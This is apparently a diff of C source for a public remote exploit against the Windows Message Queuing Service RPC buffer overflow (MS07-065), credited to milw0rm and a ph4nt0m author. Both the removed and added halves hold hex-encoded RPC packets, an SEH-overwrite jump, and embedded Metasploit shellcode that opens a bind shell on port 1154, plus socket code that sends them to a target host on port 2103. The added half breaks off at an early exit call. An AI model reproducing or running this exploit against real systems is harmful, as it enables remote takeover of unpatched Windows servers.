-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0xeb, 0x06, 0x42, 0x42, 0x32, 0xb0,	// \xeb\x06\x42\x42 jmpcode
-  0x01, 0x78, 0x2b, 0xc9, 0x83, 0xe9, 0xb0, 0xd9,	//  overwrite seh ; call ebx
-  0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73,	//  bindshell on port 1154, metasploit shellcode
-  0x13, 0x1d, 0x82, 0x67, 0xb4, 0x83, 0xeb, 0xfc,
-  0xe2, 0xf4, 0xe1, 0xe8, 0x8c, 0xf9, 0xf5, 0x7b,
-  0x98, 0x4b, 0xe2, 0xe2, 0xec, 0xd8, 0x39, 0xa6,
-  0xec, 0xf1, 0x21, 0x09, 0x1b, 0xb1, 0x65, 0x83,
-  0x88, 0x3f, 0x52, 0x9a, 0xec, 0xeb, 0x3d, 0x83,
-  0x8c, 0xfd, 0x96, 0xb6, 0xec, 0xb5, 0xf3, 0xb3,
-  0xa7, 0x2d, 0xb1, 0x06, 0xa7, 0xc0, 0x1a, 0x43,
-  0xad, 0xb9, 0x1c, 0x40, 0x8c, 0x40, 0x26, 0xd6,
-  0x43, 0x9c, 0x68, 0x67, 0xec, 0xeb, 0x39, 0x83,
-  0x8c, 0xd2, 0x96, 0x8e, 0x2c, 0x3f, 0x42, 0x9e,
-  0x66, 0x5f, 0x1e, 0xae, 0xec, 0x3d, 0x71, 0xa6,
-  0x7b, 0xd5, 0xde, 0xb3, 0xbc, 0xd0, 0x96, 0xc1,
-  0x57, 0x3f, 0x5d, 0x8e, 0xec, 0xc4, 0x01, 0x2f,
-  0xec, 0xf4, 0x15, 0xdc, 0x0f, 0x3a, 0x53, 0x8c,
-  0x8b, 0xe4, 0xe2, 0x54, 0x01, 0xe7, 0x7b, 0xea,
-  0x54, 0x86, 0x75, 0xf5, 0x14, 0x86, 0x42, 0xd6,
-  0x98, 0x64, 0x75, 0x49, 0x8a, 0x48, 0x26, 0xd2,
-  0x98, 0x62, 0x42, 0x0b, 0x82, 0xd2, 0x9c, 0x6f,
-  0x6f, 0xb6, 0x48, 0xe8, 0x65, 0x4b, 0xcd, 0xea,
-  0xbe, 0xbd, 0xe8, 0x2f, 0x30, 0x4b, 0xcb, 0xd1,
-  0x34, 0xe7, 0x4e, 0xd1, 0x24, 0xe7, 0x5e, 0xd1,
-  0x98, 0x64, 0x7b, 0xea, 0x63, 0x36, 0x7b, 0xd1,
-  0xee, 0x55, 0x88, 0xea, 0xc3, 0xae, 0x6d, 0x45,
-  0x30, 0x4b, 0xcb, 0xe8, 0x77, 0xe5, 0x48, 0x7d,
-  0xb7, 0xdc, 0xb9, 0x2f, 0x49, 0x5d, 0x4a, 0x7d,
-  0xb1, 0xe7, 0x48, 0x7d, 0xb7, 0xdc, 0xf8, 0xcb,
-  0xe1, 0xfd, 0x4a, 0x7d, 0xb1, 0xe4, 0x49, 0xd6,
-  0x32, 0x4b, 0xcd, 0x11, 0x0f, 0x53, 0x64, 0x44,
-  0x1e, 0xe3, 0xe2, 0x54, 0x32, 0x4b, 0xcd, 0xe4,
-  0x0d, 0xd0, 0x7b, 0xea, 0x04, 0xd9, 0x94, 0x67,
-  0x0d, 0xe4, 0x44, 0xab, 0xab, 0x3d, 0xfa, 0xe8,
-  0x23, 0x3d, 0xff, 0xb3, 0xa7, 0x47, 0xb7, 0x7c,
-  0x25, 0x99, 0xe3, 0xc0, 0x4b, 0x27, 0x90, 0xf8,
-  0x5f, 0x1f, 0xb6, 0x29, 0x0f, 0xc6, 0xe3, 0x31,
-  0x71, 0x4b, 0x68, 0xc6, 0x98, 0x62, 0x46, 0xd5,
-  0x35, 0xe5, 0x4c, 0xd3, 0x0d, 0xb5, 0x4c, 0xd3,
-  0x32, 0xe5, 0xe2, 0x52, 0x0f, 0x19, 0xc4, 0x87,
-  0xa9, 0xe7, 0xe2, 0x54, 0x0d, 0x4b, 0xe2, 0xb5,
-  0x98, 0x64, 0x96, 0xd5, 0x9b, 0x37, 0xd9, 0xe6,
-  0x98, 0x62, 0x4f, 0x7d, 0xb7, 0xdc, 0xf2, 0x4c,
-  0x87, 0xd4, 0x4e, 0x7d, 0xb1, 0x4b, 0xcd, 0x82,
-  0x67, 0xb4, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41
-};
-
-
-char request_2[] = {
-  0x05, 0x00, 0x00, 0x82, 0x10, 0x00, 0x00, 0x00,
-  0x18, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
-  0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
-  0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
-  0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
-};
-
-
-
-void
-usage (char *argv)
-{
-  printf (" Usage:   %s -h 127.0.0.1 (Universal exploit)\n", argv);
-  printf ("          %s -h host -n dnsname [-p port]\n", argv);
-  exit (1);
-}
-
-
-
-/************* TCP connect *************************/
-
-void Disconnect (SOCKET s);
-
-
-// ripped from isno
-int
-Make_Connection (char *address, int port, int timeout)
-{
-  struct sockaddr_in target;
-  SOCKET s;
-  int i;
-  DWORD bf;
-  fd_set wd;
-  struct timeval tv;
-
-  s = socket (AF_INET, SOCK_STREAM, 0);
-  if (s < 0)
-    return -1;
-
-  target.sin_family = AF_INET;
-  target.sin_addr.s_addr = inet_addr (address);
-  if (target.sin_addr.s_addr == 0)
-    {
-      closesocket (s);
-      return -2;
-    }
-  target.sin_port = htons ((short) port);
-  bf = 1;
-  ioctlsocket (s, FIONBIO, &bf);
-  tv.tv_sec = timeout;
-  tv.tv_usec = 0;
-  FD_ZERO (&wd);
-  FD_SET (s, &wd);
-  connect (s, (struct sockaddr *) &target, sizeof (target));
-  if ((i = select (s + 1, 0, &wd, 0, &tv)) == (-1))
-    {
-      closesocket (s);
-      return -3;
-    }
-  if (i == 0)
-    {
-      closesocket (s);
-      return -4;
-    }
-  i = sizeof (int);
-  getsockopt (s, SOL_SOCKET, SO_ERROR, (char *) &bf, &i);
-  if ((bf != 0) || (i != sizeof (int)))
-    {
-      closesocket (s);
-      return -5;
-    }
-  ioctlsocket (s, FIONBIO, &bf);
-  return s;
-}
-
-
-void
-Disconnect (SOCKET s)
-{
-  closesocket (s);
-  WSACleanup ();
-}
-
-
-
-
-/****************************************************/
-
-
-
-int
-main (int argc, char *argv[])
-{
-
-  unsigned char *target = NULL;
-  unsigned char *name = NULL;
-  int port = 2103;
-
-  int i, j, len, len2;
-
-  int ret;
-  char buffer[6000] = { 0 };
-  SOCKET s;
-  WSADATA WSAData;
-
-  printf("--------------------------------------------------------------------------\n");
-  printf("-== Windows Message Queuing Service RPC BOF Exploit (MS07-065) - MK mod ==-\n");
-  printf("-== code by axis@ph4nt0m ==-\n");
-  printf("-== Http://www.ph4nt0m.org ==-\n");
-  printf("-== Tested against Windows 2000 server SP4 ==-\n");
-  printf
-    ("--------------------------------------------------------------------------\n\n");
-
-  if (argc < 5)
-    usage (argv[0]);		//Handle parameters
-  for (i = 1; i < argc; i++)
-    {
-      if ((argv[i][0] == '-'))
-	{
-	  switch (argv[i][1])
-	    {
-	    case 'h':
-	      target = (unsigned char *) argv[i + 1];
-	      break;
-	    case 'p':
-	      if (strcmp (argv[i + 1], "2103") == 0)
-		{
-		  printf ("[+] Attacking default port 2103\n");
-		}
-	      else
-		{
-		  port = atoi (argv[i + 1]);
-		}
-	      break;
-	    case 'n':
-	      name = (unsigned char *) argv[i + 1];
-	      break;
-	    default:
-	      printf ("[-] Invalid argument: %s\n", argv[i]);
-	      usage (argv[0]);
-	      break;
-	    }
-	  i++;
-	}
-      else
-	usage (argv[0]);
-    }
-
-
-  request_1b = malloc (sizeof (char) * (strlen (name) * 2));
-
-  if (request_1b == NULL)
-    {
-      printf ("Allocation Error\n");
-      exit (1);
-    }
-
-
-  strcpy (request_1b, name);
-
-
-  for (i = 0, j = 0; j < (strlen (name) * 2); j++)
-    {
-      if (!(j % 2))
-	{
-	  *(request_1b + j) = *(name + i);
-	}
-      else
-	{
-	  *(request_1b + j) = '\x00';
-	  i++;
-	}
-    }
-
-
-
-
-
-/********************** attack payload ***************************/
-  if (WSAStartup (MAKEWORD (1, 1), &WSAData) != 0)
-    {
-      fprintf (stderr, "[-] WSAStartup failed.\n");
-      WSACleanup ();
-      exit (1);
-    }
-
-
-  Sleep (1200);
-
-
-  s = Make_Connection ((char *) target, port, 10);
-  if (s < 0)
-    {
-      fprintf (stderr, "[-] connect err.\n");
-      exit (1);
-    }
-
-  //Send our evil Payload              
-  printf ("[*]Sending our Payload, Good Luck! ^_^\n");
-
-  printf ("[*]Sending RPC Bind String!\n");
-
-  send (s, bind_str, sizeof (bind_str), 0);
-
-
-  Sleep (1000);
-
-  printf ("[*]Sending RPC Request Now!\n");
-
-  len = 56 + (strlen (name) * 2) + 640;
-
-  request_1 = calloc (len, sizeof (char));
-
-  if (request_1 == NULL)
-  {
-    printf ("Allocation Error\n");
-    exit (1);
-  }
-
-  memcpy (request_1, request_1a, 56);
-  memcpy (request_1 + 56, request_1b, (strlen (name) * 2));
-  memcpy (request_1 + 56 + (strlen (name) * 2), request_1c, 640);
-
-
-  exit(1);
-
-  memset (buffer, '\x41', sizeof (buffer));	// fil the buffer to trigger seh
-  send (s, request_1, sizeof (request_1), 0);
-  send (s, buffer, 5104, 0);	// fil the buffer to trigger seh
-  send (s, request_2, sizeof (request_2), 0);
-
-
-  Sleep (100);
-
-  memset (buffer, 0, sizeof (buffer));
-  ret = recv (s, buffer, sizeof (buffer) - 1, 0);
-  //printf("recv: %s\n", buffer);
-
-  Disconnect (s);
-
-  return 0;
-}
-
-// milw0rm.com [2008-01-18]
+/*
+Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065) 
+Mod of axis's code.
+
+CHANGELOG
+
+- added dnsname as a parameter, before it was hardcoded in the 
+  request data. (Marcin Kozlowski)
+
+Provided for legal security research and testing purposes ONLY
+
+Go through the code  :) 
+ 
+*/
+
+#include 
+#include 
+#include 
+#include 
+#include 
+#pragma comment(lib,"ws2_32")
+
+// RPC Bind UUID: fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0
+char bind_str[] = {
+  0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,
+  0x48, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
+  0xd0, 0x16, 0xd0, 0x16, 0x00, 0x00, 0x00, 0x00,
+  0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
+  0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
+  0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
+  0x01, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
+  0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
+  0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00
+};
+
+
+char *request_1;
+
+
+// RPC Request  Opnum: 0x06 
+char request_1a[] = {
+  0x05, 0x00, 0x00, 0x81, 0x10, 0x00, 0x00, 0x00,
+  0xd0, 0x16, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
+  0x98, 0x17, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
+  0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
+  0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
+  0x01, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00
+};
+
+
+char *request_1b;
+
+
+char request_1c[] = {
+  0x5c, 0x00, 0x00, 0xcc, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0xeb, 0x06, 0x42, 0x42, 0x32, 0xb0,	// \xeb\x06\x42\x42 jmpcode
+  0x01, 0x78, 0x2b, 0xc9, 0x83, 0xe9, 0xb0, 0xd9,	//  overwrite seh ; call ebx
+  0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73,	//  bindshell on port 1154, metasploit shellcode
+  0x13, 0x1d, 0x82, 0x67, 0xb4, 0x83, 0xeb, 0xfc,
+  0xe2, 0xf4, 0xe1, 0xe8, 0x8c, 0xf9, 0xf5, 0x7b,
+  0x98, 0x4b, 0xe2, 0xe2, 0xec, 0xd8, 0x39, 0xa6,
+  0xec, 0xf1, 0x21, 0x09, 0x1b, 0xb1, 0x65, 0x83,
+  0x88, 0x3f, 0x52, 0x9a, 0xec, 0xeb, 0x3d, 0x83,
+  0x8c, 0xfd, 0x96, 0xb6, 0xec, 0xb5, 0xf3, 0xb3,
+  0xa7, 0x2d, 0xb1, 0x06, 0xa7, 0xc0, 0x1a, 0x43,
+  0xad, 0xb9, 0x1c, 0x40, 0x8c, 0x40, 0x26, 0xd6,
+  0x43, 0x9c, 0x68, 0x67, 0xec, 0xeb, 0x39, 0x83,
+  0x8c, 0xd2, 0x96, 0x8e, 0x2c, 0x3f, 0x42, 0x9e,
+  0x66, 0x5f, 0x1e, 0xae, 0xec, 0x3d, 0x71, 0xa6,
+  0x7b, 0xd5, 0xde, 0xb3, 0xbc, 0xd0, 0x96, 0xc1,
+  0x57, 0x3f, 0x5d, 0x8e, 0xec, 0xc4, 0x01, 0x2f,
+  0xec, 0xf4, 0x15, 0xdc, 0x0f, 0x3a, 0x53, 0x8c,
+  0x8b, 0xe4, 0xe2, 0x54, 0x01, 0xe7, 0x7b, 0xea,
+  0x54, 0x86, 0x75, 0xf5, 0x14, 0x86, 0x42, 0xd6,
+  0x98, 0x64, 0x75, 0x49, 0x8a, 0x48, 0x26, 0xd2,
+  0x98, 0x62, 0x42, 0x0b, 0x82, 0xd2, 0x9c, 0x6f,
+  0x6f, 0xb6, 0x48, 0xe8, 0x65, 0x4b, 0xcd, 0xea,
+  0xbe, 0xbd, 0xe8, 0x2f, 0x30, 0x4b, 0xcb, 0xd1,
+  0x34, 0xe7, 0x4e, 0xd1, 0x24, 0xe7, 0x5e, 0xd1,
+  0x98, 0x64, 0x7b, 0xea, 0x63, 0x36, 0x7b, 0xd1,
+  0xee, 0x55, 0x88, 0xea, 0xc3, 0xae, 0x6d, 0x45,
+  0x30, 0x4b, 0xcb, 0xe8, 0x77, 0xe5, 0x48, 0x7d,
+  0xb7, 0xdc, 0xb9, 0x2f, 0x49, 0x5d, 0x4a, 0x7d,
+  0xb1, 0xe7, 0x48, 0x7d, 0xb7, 0xdc, 0xf8, 0xcb,
+  0xe1, 0xfd, 0x4a, 0x7d, 0xb1, 0xe4, 0x49, 0xd6,
+  0x32, 0x4b, 0xcd, 0x11, 0x0f, 0x53, 0x64, 0x44,
+  0x1e, 0xe3, 0xe2, 0x54, 0x32, 0x4b, 0xcd, 0xe4,
+  0x0d, 0xd0, 0x7b, 0xea, 0x04, 0xd9, 0x94, 0x67,
+  0x0d, 0xe4, 0x44, 0xab, 0xab, 0x3d, 0xfa, 0xe8,
+  0x23, 0x3d, 0xff, 0xb3, 0xa7, 0x47, 0xb7, 0x7c,
+  0x25, 0x99, 0xe3, 0xc0, 0x4b, 0x27, 0x90, 0xf8,
+  0x5f, 0x1f, 0xb6, 0x29, 0x0f, 0xc6, 0xe3, 0x31,
+  0x71, 0x4b, 0x68, 0xc6, 0x98, 0x62, 0x46, 0xd5,
+  0x35, 0xe5, 0x4c, 0xd3, 0x0d, 0xb5, 0x4c, 0xd3,
+  0x32, 0xe5, 0xe2, 0x52, 0x0f, 0x19, 0xc4, 0x87,
+  0xa9, 0xe7, 0xe2, 0x54, 0x0d, 0x4b, 0xe2, 0xb5,
+  0x98, 0x64, 0x96, 0xd5, 0x9b, 0x37, 0xd9, 0xe6,
+  0x98, 0x62, 0x4f, 0x7d, 0xb7, 0xdc, 0xf2, 0x4c,
+  0x87, 0xd4, 0x4e, 0x7d, 0xb1, 0x4b, 0xcd, 0x82,
+  0x67, 0xb4, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41
+};
+
+
+char request_2[] = {
+  0x05, 0x00, 0x00, 0x82, 0x10, 0x00, 0x00, 0x00,
+  0x18, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
+  0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
+  0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
+  0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+  0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
+};
+
+
+
+void
+usage (char *argv)
+{
+  printf (" Usage:   %s -h 127.0.0.1 (Universal exploit)\n", argv);
+  printf ("          %s -h host -n dnsname [-p port]\n", argv);
+  exit (1);
+}
+
+
+
+/************* TCP connect *************************/
+
+void Disconnect (SOCKET s);
+
+
+// ripped from isno
+int
+Make_Connection (char *address, int port, int timeout)
+{
+  struct sockaddr_in target;
+  SOCKET s;
+  int i;
+  DWORD bf;
+  fd_set wd;
+  struct timeval tv;
+
+  s = socket (AF_INET, SOCK_STREAM, 0);
+  if (s < 0)
+    return -1;
+
+  target.sin_family = AF_INET;
+  target.sin_addr.s_addr = inet_addr (address);
+  if (target.sin_addr.s_addr == 0)
+    {
+      closesocket (s);
+      return -2;
+    }
+  target.sin_port = htons ((short) port);
+  bf = 1;
+  ioctlsocket (s, FIONBIO, &bf);
+  tv.tv_sec = timeout;
+  tv.tv_usec = 0;
+  FD_ZERO (&wd);
+  FD_SET (s, &wd);
+  connect (s, (struct sockaddr *) &target, sizeof (target));
+  if ((i = select (s + 1, 0, &wd, 0, &tv)) == (-1))
+    {
+      closesocket (s);
+      return -3;
+    }
+  if (i == 0)
+    {
+      closesocket (s);
+      return -4;
+    }
+  i = sizeof (int);
+  getsockopt (s, SOL_SOCKET, SO_ERROR, (char *) &bf, &i);
+  if ((bf != 0) || (i != sizeof (int)))
+    {
+      closesocket (s);
+      return -5;
+    }
+  ioctlsocket (s, FIONBIO, &bf);
+  return s;
+}
+
+
+void
+Disconnect (SOCKET s)
+{
+  closesocket (s);
+  WSACleanup ();
+}
+
+
+
+
+/****************************************************/
+
+
+
+int
+main (int argc, char *argv[])
+{
+
+  unsigned char *target = NULL;
+  unsigned char *name = NULL;
+  int port = 2103;
+
+  int i, j, len, len2;
+
+  int ret;
+  char buffer[6000] = { 0 };
+  SOCKET s;
+  WSADATA WSAData;
+
+  printf("--------------------------------------------------------------------------\n");
+  printf("-== Windows Message Queuing Service RPC BOF Exploit (MS07-065) - MK mod ==-\n");
+  printf("-== code by axis@ph4nt0m ==-\n");
+  printf("-== Http://www.ph4nt0m.org ==-\n");
+  printf("-== Tested against Windows 2000 server SP4 ==-\n");
+  printf
+    ("--------------------------------------------------------------------------\n\n");
+
+  if (argc < 5)
+    usage (argv[0]);		//Handle parameters
+  for (i = 1; i < argc; i++)
+    {
+      if ((argv[i][0] == '-'))
+	{
+	  switch (argv[i][1])
+	    {
+	    case 'h':
+	      target = (unsigned char *) argv[i + 1];
+	      break;
+	    case 'p':
+	      if (strcmp (argv[i + 1], "2103") == 0)
+		{
+		  printf ("[+] Attacking default port 2103\n");
+		}
+	      else
+		{
+		  port = atoi (argv[i + 1]);
+		}
+	      break;
+	    case 'n':
+	      name = (unsigned char *) argv[i + 1];
+	      break;
+	    default:
+	      printf ("[-] Invalid argument: %s\n", argv[i]);
+	      usage (argv[0]);
+	      break;
+	    }
+	  i++;
+	}
+      else
+	usage (argv[0]);
+    }
+
+
+  request_1b = malloc (sizeof (char) * (strlen (name) * 2));
+
+  if (request_1b == NULL)
+    {
+      printf ("Allocation Error\n");
+      exit (1);
+    }
+
+
+  strcpy (request_1b, name);
+
+
+  for (i = 0, j = 0; j < (strlen (name) * 2); j++)
+    {
+      if (!(j % 2))
+	{
+	  *(request_1b + j) = *(name + i);
+	}
+      else
+	{
+	  *(request_1b + j) = '\x00';
+	  i++;
+	}
+    }
+
+
+
+
+
+/********************** attack payload ***************************/
+  if (WSAStartup (MAKEWORD (1, 1), &WSAData) != 0)
+    {
+      fprintf (stderr, "[-] WSAStartup failed.\n");
+      WSACleanup ();
+      exit (1);
+    }
+
+
+  Sleep (1200);
+
+
+  s = Make_Connection ((char *) target, port, 10);
+  if (s < 0)
+    {
+      fprintf (stderr, "[-] connect err.\n");
+      exit (1);
+    }
+
+  //Send our evil Payload              
+  printf ("[*]Sending our Payload, Good Luck! ^_^\n");
+
+  printf ("[*]Sending RPC Bind String!\n");
+
+  send (s, bind_str, sizeof (bind_str), 0);
+
+
+  Sleep (1000);
+
+  printf ("[*]Sending RPC Request Now!\n");
+
+  len = 56 + (strlen (name) * 2) + 640;
+
+  request_1 = calloc (len, sizeof (char));
+
+  if (request_1 == NULL)
+  {
+    printf ("Allocation Error\n");
+    exit (1);
+  }
+
+  memcpy (request_1, request_1a, 56);
+  memcpy (request_1 + 56, request_1b, (strlen (name) * 2));
+  memcpy (request_1 + 56 + (strlen (name) * 2), request_1c, 640);
+
+
+  exit(1);
